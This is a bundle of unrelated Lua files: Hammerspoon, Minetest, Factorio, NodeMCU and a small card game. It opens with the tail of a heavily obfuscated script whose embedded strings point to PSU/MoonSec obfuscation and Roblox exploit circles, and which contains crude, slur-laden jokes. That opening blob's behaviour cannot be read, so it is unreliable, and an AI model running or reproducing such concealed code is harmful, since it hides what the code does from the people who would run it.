];__[_[___l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_l__]][__[_[__lll]]]=__[_[__ll_]];_l=_l+_ll;_=__l[_l];for _=_[_l__],_[_llll]do __[_]=nil;end;_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))break end while(_l_)/((1764+-0x18))==538 do local ____l;local __l_l;local _l_;_l_=_[_ll_]__[_l_](_l_l(__,_l_+_l__l,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_];__l_l=__[_[__lll]];__[_l_+1]=__l_l;__[_l_]=__l_l[__[_[_ll__]]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]={};_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];_l_=_[_ll_];____l=__[_l_];for _=_l_+1,_[__lll]do _l_lll(____l,__[_])end;break end;break;end while 3902==(_l_)/((-65+0xb3a))do _l_=(4956432)while __l_l>(0x163+-116)do _l_-= _l_ local _={__,_};_[_l__l][_[_l___][_lll]]=_[_ll][_[_l___][__l__]]+_[_l__l][_[_l___][___ll]];break end while 2197==(_l_)/((-0x2e+2302))do __[_[_ll_l]]=__[_[__lll]][_[__ll_]];break end;break;end break;end break;end while(_l_)/((-27+0xec5))==757 do _l_=(467596)while(0x220-300)>=__l_l do _l_-= _l_ _l_=(13630875)while __l_l<=((1084-0x237)-275)do _l_-= _l_ _l_=(3352650)while((-#[[This code was obfuscated using PSU, which stands for Penis Sucking Utilities]]+(0x5519ac/132))/175)<__l_l do _l_-= _l_ local _l=_[___l]__[_l](_l_l(__,_l+_l__l,_[_l_ll]))break end while(_l_)/(((0xaaa-1400)+-#[[dOeS iT sUppOrT gEtFeNv tHo?]]))==2575 do local ___;local _l_l;local _lll;local _l_;__[_[_ll_]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_____[_[__lll]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_];_lll=__[_[__ll]];__[_l_+1]=_lll;__[_l_]=_lll[_[__l__]];_l=_l+_ll;_=__l[_l];_l_=_[_l__]_l_l={__[_l_](__[_l_+1])};___=0;for _=_l_,_[_l_l_]do ___=___+_ll;__[_]=_l_l[___];end _l=_l+_ll;_=__l[_l];_l=_[_llll];break end;break;end while(_l_)/((3402+-0x39))==4075 do _l_=(643808)while(313+-0x46)<__l_l do _l_-= _l_ __[_[_lll]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[____]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__[_[_llll]][_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[__lll]][_[___l_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[__ll]][_[__l__]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[_llll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[____]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[_l_ll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_l__]][_[__ll]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];do return end;break end while 3658==(_l_)/((203+(0x3a-85)))do _____[_[__lll]]=__[_[_l__]];break end;break;end break;end while 556==(_l_)/(((0x38e+(-#'mom shot dad'+(-0xe10/225)))+-#[[oh oh i will hack you =opens dev console=]]))do _l_=(5492707)while __l_l<=(0x242-332)do _l_-= _l_ _l_=(5474412)while(0xe5b/15)<__l_l do _l_-= _l_ local __ll;local _l_;_l_=_[_ll_]__[_l_](_l_l(__,_l_+_l__l,_[____]))_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_l__];__ll=__[_[___ll]];__[_l_+1]=__ll;__[_l_]=__ll[__[_[__ll_]]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=(_[__lll]~=0);break end while 1758==(_l_)/((((0x2b07440/112)/0x7f)+-#'gay person has currently attempted cracking of the century'))do local _=_[_ll_l]__[_](_l_l(__,_+_l__l,____l))break end;break;end while(_l_)/((3179+(-#'This is my kingdom cum, this is my kingdom cum'+(-4-0x26))))==1777 do _l_=(141542)while __l_l>(35321/0x8f)do _l_-= _l_ local __l__;local _l___,_____;local __l_l;local _l_;__[_[___]]();_l=_l+_ll;_=__l[_l];__[_[_ll_l]]={};_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]][_[____]]=__[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[___l]][_[_l_ll]]=_[_lll_];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];__l_l=__[_[__lll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[___ll]][_[___l_]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[_llll]][_[__ll_]];_l=_l+_ll;_=__l[_l];_l_=_[_lll];__l_l=__[_[__lll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[____]];_l=_l+_ll;_=__l[_l];_l_=_[___l]_l___,_____=_lllll(__[_l_](__[_l_+_l__l]))____l=_____+_l_-_ll __l__=0;for _=_l_,____l do __l__=__l__+_ll;__[_]=_l___[__l__];end;_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_](_l_l(__,_l_+_l__l,____l))_l=_l+_ll;_=__l[_l];if(__[_[_lll]]==_[_ll__])then _l=_l+_l__l;else _l=_[___ll];end;break end while(_l_)/((1632-0x352))==181 do local _=_[_lll];do return _l_l(__,_,____l)end;break end;break;end break;end break;end break;end break;end break;end break;end _l+= _l__l end;end);end;return ___lll(__ll_l(),{},__l__l())()end)_msec({[(339-0xb7)]='\115\116'..(function(_)return(_ and'(0xf6-146)')or'\114\105'or'\120\58'end)(((1338+-0x53)/251)==((162+-0x74)+-#[[You know math? sqrt(-2) * sqrt(-32) = ??]]))..'\110g',[(-#{'nil';(function()return('o0l8I8'):find("\108")end)(),(function()return('o0l8I8'):find("\108")end)(),kernel32dII}+714)]='\108\100'..(function(_)return(_ and'(((-9855/0xdb)+0x9c)+-#\'daddy chill\')')or'\101\120'or'\119\111'end)(((0x85-77)+-#'You know lua? name every metamethod - skids of v3rm')==(-#'while true do end'+(0x9d-134)))..'\112',[(225+-#{'nil';1;nil;kernel32dII})]=(function(_)return(_ and'((329-0xcb)+-#"starmcommunity.ru/scamlink")')and'\98\121'or'\100\120'end)((0x217/(321-0xd6))==(1015/0xcb))..'\116\101',[(-#{38;",",(function()return{','}end)();(function()return{','}end)(),(function()return('iRHH1I'):find("\19")end)();(function()return('iRHH1I'):find("\19")end)()}+360)]='\99'..(function(_)return(_ and'(134+-0x22)')and'\90\19\157'or'\104\97'end)((105-0x64)==(103-0x64))..'\114',[(-#'moonsec top'+(0x288+-76))]='\116\97'..(function(_)return(_ and'(263-0xa3)')and'\64\113'or'\98\108'end)((-25+0x1f)==(66-0x3d))..'\101',[(496+-0x4f)]=(function(_)return(_ and'(-#"Rogue Lineage"+(16159/0x8f))')or'\115\117'or'\78\107'end)((-124+0x7f)==(0x10b6/138))..'\98',[(0x74c-980)]='\99\111'..(function(_)return(_ and'(-#[[hank hub, more like wank hum xdxdxd, shutup]]+(369-0xe2))')and'\110\99'or'\110\105\103\97'end)((0x5c-61)==(99+-0x44))..'\97\116',[(56580/0x52)]=(function(_,_l)return(_ and'(-#\'when is federal going to meet memcorrupt irl\'+(0x141-177))')and'\48\159\158\188\10'or'\109\97'end)((0x57-82)==(0x66-96))..'\116\104',[((445662/0xa2)-0x56b)]=(function(_,_l)return((55-0x32)==(0x64-97)and'\48'..'\195'or _..((not'\20\95\69'and'\90'..'\180'or _l)))or'\199\203\95'end),[(973+-#{55,55;32;kernel32dII,(function(_)return _ end)()})]='\105\110'..(function(_,_l)return(_ and'(224-0x7c)')and'\90\115\138\115\15'or'\115\101'end)((-#'Logue Rineage'+(1854/0x67))==(6355/0xcd))..'\114\116',[(0x13319/77)]='\117\110'..(function(_,_l)return(_ and'(-#\'i still hate noobmaster\'+(-87+0xd2))')or'\112\97'or'\20\38\154'end)((0x32-45)==(-56+0x57))..'\99\107',[(-#[[somebody play minecraft with lerebox please hes so lonely]]+(-0x38+1235))]='\115\101'..(function(_)return(_ and'(194+-0x5e)')and'\110\112\99\104'or'\108\101'end)((0x66-97)==((-56+0x1c50)/232))..'\99\116',[((-0x66+1336)+-#[[balls in ur jawz]])]='\116\111\110'..(function(_,_l)return(_ and'(0xc6+-98)')and'\117\109\98'or'\100\97\120\122'end)((-#"psu more like psshit hahahaha laugh at my joke everyone"+(0xa4-104))==((-0x38+78)+-#'i hate noobmaster'))..'\101\114'},{[((-82+0xb2)+-#[[table.concat = nil]])]=((getfenv))},((getfenv))()) end)()
|
local obj = {}
obj.__index = obj
-- Metadata
obj.name = "Links"
obj.version = "1.0"
obj.author = "Chophi <[email protected]>"
local json = hs.json
local linksFile = getVifFile("links.json")
local links = nil
-- Link:
-- url: the link url
-- description: the description of the url
-- app: the application to open it
-- groups: comma separated list
function obj:test()
hs.alert.show("This is a test from Links, linkFile is " .. linksFile)
local status = "operation"
local tb = {status=status}
hs.alert.show(hs.inspect.inspect(tb))
status = "new operation"
hs.alert.show(hs.inspect.inspect(tb))
end
function obj:load()
return json.read(linksFile)
end
function obj:save(links)
return json.write(links, linksFile, true, true)
end
function obj:validate(link)
return link.description ~= nil and link.url ~= nil and type(link.url) == "string" and type(link.description) == "string"
end
function obj:update(url, newLink)
if obj:validate(newLink) then
if links == nil then
links = obj:load()
end
end
local found = false
for i, link in pairs(links) do
if link.url == url then
links[i] = newLink
found = true
break
end
end
if found ~= true then
links[#links] = newLink
end
obj:save(links)
end
function obj:add()
end
return obj
|
-- ---- ---- ---- Modern Mobs ---- ---- ---- --
-- ---- Team AB - Gang 1 ---- --
-- Boss
mobs:register_mob("mobs_modern:moTABb", {
type = "tab",
hp_min = 33,
hp_max = 35,
collisionbox = {-0.3, -0.8, -0.3, 0.3, 0.8, 0.3},
visual = "mesh",
mesh = "3d_armor_character.b3d",
textures = {
{"TAB_b1.png", "3d_armor_trans.png", minetest.registered_items["mobs_modern:weapon_g36"].inventory_image,},
-- {"TA_b2.png", "3d_armor_trans.png", minetest.registered_items["mobs_modern:weapon_g36"].inventory_image,},
-- {"TA_b3.png", "3d_armor_trans.png", minetest.registered_items["mobs_modern:weapon_m200"].inventory_image,},
},
visual_size = {x=1, y=.8},
makes_footstep_sound = true,
view_range = 25,
walk_velocity = 1.6,
run_velocity = 4,
damage = 2.5,
drops = {
{name = "default:leaves",
chance = 1,
min = 3,
max = 5,},
{name = "default:sword_steel",
chance = 2,
min = 0,
max = 1,},
{name = "default:stick",
chance = 2,
min = 13,
max=30,},
},
armor = 40,
drawtype = "front",
owner = "",
water_damage = 0,
lava_damage = 50,
light_damage = 0,
fear_height = 5,
follow = "default:apple",
attack_type = "dogshoot",
dogshoot_switch = 1,
dogshoot_count_max = 3, -- shoot for 4 seconds
dogshoot_count2_max = 1, -- dogfight for 2 seconds
reach = 2,
punch_interval = 1,
shoot_interval = .3,
arrow = "mobs_modern:bullet",
shoot_offset = 2,
pathfinding = true,
animation = {
speed_normal = 30, speed_run = 30,
stand_start = 0, stand_end = 79,
walk_start = 168, walk_end = 187,
run_start = 168, run_end = 187,
punch_start = 200, punch_end = 219,
},
sounds = {
war_cry = "mobs_oerkki_attack",
death = "mobs_death1",
attack = "default_punch",
},
blood_amount = 3,
blood_texture = "mobs_blood.png",
attacks_monsters = true,
attacks_tacs = true,
peaceful = false,
group_attack = false,
step = 1,
})
-- Gang Member
mobs:register_mob("mobs_modern:moTABg", {
type = "tab",
hp_min = 22,
hp_max = 26,
collisionbox = {-0.3, -0.6, -0.3, 0.3, 0.8, 0.3},
visual = "mesh",
mesh = "3d_armor_character.b3d",
textures = {
{"TAB_g1.png", "3d_armor_trans.png", minetest.registered_items["mobs_modern:weapon_g36"].inventory_image,},
{"TAB_g2.png", "3d_armor_trans.png", minetest.registered_items["mobs_modern:weapon_g36"].inventory_image,},
{"TAB_g3.png", "3d_armor_trans.png", minetest.registered_items["mobs_modern:weapon_m200"].inventory_image,},
{"TAB_g4.png", "3d_armor_trans.png", minetest.registered_items["mobs_modern:weapon_g36"].inventory_image,},
{"TAB_g5.png", "3d_armor_trans.png", minetest.registered_items["mobs_modern:weapon_g36"].inventory_image,},
{"TAB_g6.png", "3d_armor_trans.png", minetest.registered_items["mobs_modern:weapon_m200"].inventory_image,},
{"TAB_g7.png", "3d_armor_trans.png", minetest.registered_items["mobs_modern:weapon_g36"].inventory_image,},
{"TAB_g8.png", "3d_armor_trans.png", minetest.registered_items["mobs_modern:weapon_g36"].inventory_image,},
},
visual_size = {x=1.2, y=1},
makes_footstep_sound = true,
view_range = 22,
walk_velocity = 0.1,
run_velocity = 2,
damage = 3,
drops = {
{name = "default:stone_with_mese",
chance = 7,
min = 0,
max = 5,},
{name = "default:sword_steel",
chance = 1,
min = 0,
max = 1,},
{name = "default:apple",
chance = 1,
min = 1,
max=3,},
},
armor = 80,
drawtype = "front",
water_damage = 10,
lava_damage = 50,
light_damage = 1,
fear_height = 5,
on_rightclick = nil,
attack_type = "dogshoot",
dogshoot_switch = 1,
dogshoot_count_max = 3, -- shoot for 4 seconds
dogshoot_count2_max = 7, -- dogfight for 2 seconds
reach = 2,
punch_interval = 1.2,
shoot_interval = .5,
arrow = "mobs_modern:bullet",
shoot_offset = 2,
attack_chance = 25,
pathfinding = true,
group_attack = true,
replace_rate = 5,
replace_what = {"default:torch"},
replace_with = "air",
replace_offset = -1,
attacks_tacs = true,
runaway_from = {"mobs_modern:moTAAof"},
peaceful = false,
on_blast = function(self, clicker)
local item = clicker:get_wielded_item()
local_chat = function(pos,text,radius)
if radius == nil then
radius = 25
end
if pos ~= nil then
local oir = minetest.get_objects_inside_radius(pos, radius)
for _,p in pairs(oir) do
if p:is_player() then
minetest.chat_send_player(p:get_player_name(),text)
end
end
end
end
local_chat(clicker:getpos(),"BGangmember: Oh shiiat !!!",3)
end,
on_rightclick = function(self, clicker)
local item = clicker:get_wielded_item()
local_chat = function(pos,text,radius)
if radius == nil then
radius = 25
end
if pos ~= nil then
local oir = minetest.get_objects_inside_radius(pos, radius)
for _,p in pairs(oir) do
if p:is_player() then
minetest.chat_send_player(p:get_player_name(),text)
end
end
end
end
local_chat(clicker:getpos(),"BGangmember: What's crackin ?!",3)
end,
blood_amount = 5,
blood_texture = "mobs_blood.png",
animation = {
speed_normal = 30, speed_run = 30,
stand_start = 0, stand_end = 79,
walk_start = 168, walk_end = 187,
run_start = 168, run_end = 187,
punch_start = 200, punch_end = 219,
},
sounds = {
war_cry = "mobs_barbarian_yell2",
death = "mobs_howl",
attack = "default_punch3",
},
})
--mobs:register_spawn("mobs_modern:moTABb", {"mobs_modern:ntac"}, 5, 0, 10000, 1, 31000)
--mobs:register_spawn("mobs_modern:moTABg", {"mobs_modern:ntac"}, 5, 0, 10000, 1, 31000)
mobs:register_egg("mobs_modern:moTABb", "Gang Boss (moTAb)", "default_leaves.png", 1)
mobs:register_egg("mobs_modern:moTABg", "Gang Member (moTAb)", "default_leaves.png", 1)
|
local item = require("../item")
local image = require("../image")
return {
name = "Dealer brings money",
amount = 5,
condition = function (state)
return table.contains(state.items, item.dealer) and state.ratLevel >= 2
end,
description = "One of your dealers has executed some trades!",
heads = {
effectDescription = "-1 dealer, +100 coins (50%), -1 dealer (50%)",
effect = function (state)
local p = love.math.random()
table.delete(state.items, item.dealer)
state.ratsSold = state.ratsSold + 4
if p < 0.5 then
state.coins = state.coins + 100
return {
description = [[You negotiate a really good deal and obtain 100 coins!]],
image = image.plus100,
}
else
return {
description = [[You try negotiating but it fails. The dealer leaves you, alone and coinless. ]],
image = image.bad,
}
end
end
},
tails = {
effectDescription = "-1 dealer, +50 coins",
effect = function (state)
state.coins = state.coins + 50
table.delete(state.items, item.dealer)
state.ratsSold = state.ratsSold + 4
return {
description = [[You collect 50 coins as per usual.]],
image = image.plus50,
}
end
},
beg = {
effectDescription = "-1 dealer +25 coins (50%), +10 coins (50%)",
effect = function (state)
local p = love.math.random()
if p < 0.5 then
table.delete(state.items, item.dealer)
state.ratsSold = state.ratsSold + 4
state.coins = state.coins + 25
return {
description = [[You negotiate with the dealer, and he hands you 25 coins.]],
image = image.plus25,
}
else
state.coins = state.coins + 10
return {
description = [[The dealer pities you and hands you 10 coins.]],
image = image.plus10,
}
end
end
}
}
|
local module = {}
-- data format for STM32 (SEND) : "1:PUMP:FAN:HASH"
function module.MCUSetNewState()
local lvars = require("str_proj_strings")
if requestStates[lvars.pump] == nil then
requestStates[lvars.pump] = 999
end
if requestStates[lvars.fan] == nil then
requestStates[lvars.fan] = 999
end
local cmd_toSend = "::1234:<1:"..requestStates[lvars.pump]..":"..requestStates[lvars.fan]
local cmd_hash = crypto.hash("sha1",cmd_toSend)
print(cmd_toSend..":"..crypto.toHex(cmd_hash)..":")
end
function module.MCUReboot()
local cmd_toSend = "::1234:<23:75"
local cmd_hash = crypto.hash("sha1",cmd_toSend)
print(cmd_toSend..":"..crypto.toHex(cmd_hash)..":")
end
function serverHEX_IP(HexValue)
local oct1, oct2, oct3, oct4 = 0
oct1 = string.format("%d", (HexValue:sub(1,2)))
print(oct1)
end
function module.MCUSetConfig(vars)
local lvars = require("str_proj_strings")
if vars[lvars.dhtInt] == nil then
vars[lvars.dhtInt] = 999
end
if vars[lvars.heartbeat] == nil then
vars[lvars.heartbeat] = 999
end
if vars[lvars.server] == nil then
vars[lvars.server] = 999
end
if vars[lvars.server] ~= 999 then
serverHEX_IP(vars[lvars.server])
config.HubServer = vars[lvars.server]
end
local cmd_toSend = "::1234:<4:"..vars[lvars.dhtInt]..":"..vars[lvars.heartbeat]..":"..vars[lvars.server]
local cmd_hash = crypto.hash("sha1",cmd_toSend)
print(cmd_toSend..":"..crypto.toHex(cmd_hash)..":")
end
return module
|
-- ON ENTITY DIED
script.on_event(defines.events.on_entity_died, function(event)
local entity = event.entity
if entity.prototype.items_to_place_this then
local train = entity.train
-- creates train breaking smoke
if train.speed > 0 then
for _, carriage in pairs(train.carriages) do
if carriage.type ~= "locomotive" then
game.print(carriage.orientation)
for i = -15, 15 do
local x = carriage.position.x + math.cos(math.pi * (carriage.orientation * 2 + 0.5)) * i/5
local y = carriage.position.y + math.sin(math.pi * (carriage.orientation * 2 + 0.5)) * i/5
local offset_1_x = math.cos(math.pi * carriage.orientation * 2) * 0.75
local offset_1_y = math.sin(math.pi * carriage.orientation * 2) * 0.75
game.surfaces[entity.surface.name].create_trivial_smoke{name = "smoke-train-stop", position = {x + offset_1_x, y + offset_1_y}}
local offset_2_x = math.cos(math.pi * carriage.orientation * 2) * -0.75
local offset_2_y = math.sin(math.pi * carriage.orientation * 2) * -0.75
game.surfaces[entity.surface.name].create_trivial_smoke{name = "smoke-train-stop", position = {x + offset_2_x, y + offset_2_y}}
end
end
end
end
-- stops the train
train.speed = 0
-- creates ghost entity
local ghost_entity = game.surfaces[entity.surface.name].create_entity{
name = "entity-ghost",
inner_name = entity.name,
position = entity.position,
orientation = entity.orientation,
force = entity.force,
create_build_effect_smoke = false,
}
-- creates custom alert
local message = {"gui-alert-tooltip.ick-destroyed-train", entity.localised_name, "?"}
if event.cause then
message = {"gui-alert-tooltip.ick-destroyed-train", entity.localised_name, event.cause.localised_name}
end
for _, player in pairs(game.players) do
if player.force == entity.force and player.mod_settings["ick-alert"].value then
player.add_custom_alert(ghost_entity, {type = "virtual", name = "ick-signal-destroyed-train"}, message, true)
end
end
-- checks if destroyed entity had any special properties
local fuel_inv = entity.get_fuel_inventory()
local wagon_inv = entity.get_inventory(defines.inventory.cargo_wagon)
local request_proxies = game.surfaces[entity.surface.name].find_entities_filtered{type = "item-request-proxy", name = "item-request-proxy", position = entity.position}
local found_proxies = false
for _, proxy in pairs(request_proxies) do
if proxy.proxy_target == entity then
found_proxies = true
break
end
end
if (train.manual_mode == false and event.cause and event.cause.train == nil) or (entity.grid and entity.grid.equipment[1]) or (fuel_inv and fuel_inv.is_empty() == false) or (wagon_inv and (wagon_inv.is_filtered() or (wagon_inv.supports_bar() and (wagon_inv.get_bar() <= #wagon_inv)))) or found_proxies then
-- registers the ghost entity
local registration_number = script.register_on_entity_destroyed(ghost_entity)
-- saves type, name and position
if global.ick_destroyed_train == nil then
global.ick_destroyed_train = {}
end
global.ick_destroyed_train[registration_number] = {type = entity.type, name = entity.name, position = entity.position}
-- saves number of carriages per type if train is in automatic mode
if train.manual_mode == false and event.cause and event.cause.train == nil then
local carriages = {["locomotive"] = 0, ["cargo-wagon"] = 0, ["fluid-wagon"] = 0, ["artillery-wagon"] = 0}
for _, entity in pairs(train.carriages) do
carriages[entity.type] = carriages[entity.type] + 1
end
global.ick_destroyed_train[registration_number].train = carriages
end
-- adds request for fuel
local requests = {}
if settings.global["ick-include-fuel"].value then
if game.item_prototypes[settings.global["ick-fuel-type"].value] then
requests = {[settings.global["ick-fuel-type"].value] = settings.global["ick-fuel-amount"].value}
elseif fuel_inv and fuel_inv.is_empty() == false then
requests = fuel_inv.get_contents()
end
end
-- adds request for equipment
if settings.global["ick-include-equipment"].value and entity.grid and entity.grid.equipment[1] then
for name, count in pairs(entity.grid.get_contents()) do
if requests[name] then
requests[name] = requests[name] + count
else
requests[name] = count
end
end
-- save equipment if entity is a cargo wagon
if entity.type == "cargo-wagon" then
global.ick_destroyed_train[registration_number].equipment = entity.grid.get_contents()
end
end
-- adds request for item-request-proxies
if found_proxies then
for _, proxy in pairs(request_proxies) do
if proxy.proxy_target == entity then
for name, count in pairs(proxy.item_requests) do
if requests[name] then
requests[name] = requests[name] + count
else
requests[name] = count
end
end
end
end
end
ghost_entity.item_requests = requests
if wagon_inv then
-- saves inventory filters
if wagon_inv.is_filtered() then
local filters = {}
for i = 1, #wagon_inv do
table.insert(filters, i, wagon_inv.get_filter(i))
end
global.ick_destroyed_train[registration_number].filters = filters
end
-- saves inventory limit
if wagon_inv.supports_bar() and (wagon_inv.get_bar() <= #wagon_inv) then
global.ick_destroyed_train[registration_number].bar = wagon_inv.get_bar()
end
end
end
end
end, {{filter = "rolling-stock"}})
-- ON ENTITY BUILT
local function built_entity(entity)
if global.ick_destroyed_train then
for i, stored_info in pairs(global.ick_destroyed_train) do
if stored_info.type == entity.type and stored_info.name == entity.name and stored_info.position.x == entity.position.x and stored_info.position.y == entity.position.y then
-- Find and register the created item request proxy
local request_proxy = game.surfaces[entity.surface.name].find_entity("item-request-proxy", entity.position)
if stored_info.equipment and request_proxy then
local registration_number = script.register_on_entity_destroyed(request_proxy)
global.ick_destroyed_train[registration_number] = {position = entity.position, requests = stored_info.equipment, target = entity}
end
-- sets inventory filters
if stored_info.filters then
for i = 1, #entity.get_inventory(defines.inventory.cargo_wagon) do
entity.get_inventory(defines.inventory.cargo_wagon).set_filter(i, stored_info.filters[i])
end
end
-- sets inventory limit
if stored_info.bar then
entity.get_inventory(defines.inventory.cargo_wagon).set_bar(stored_info.bar)
end
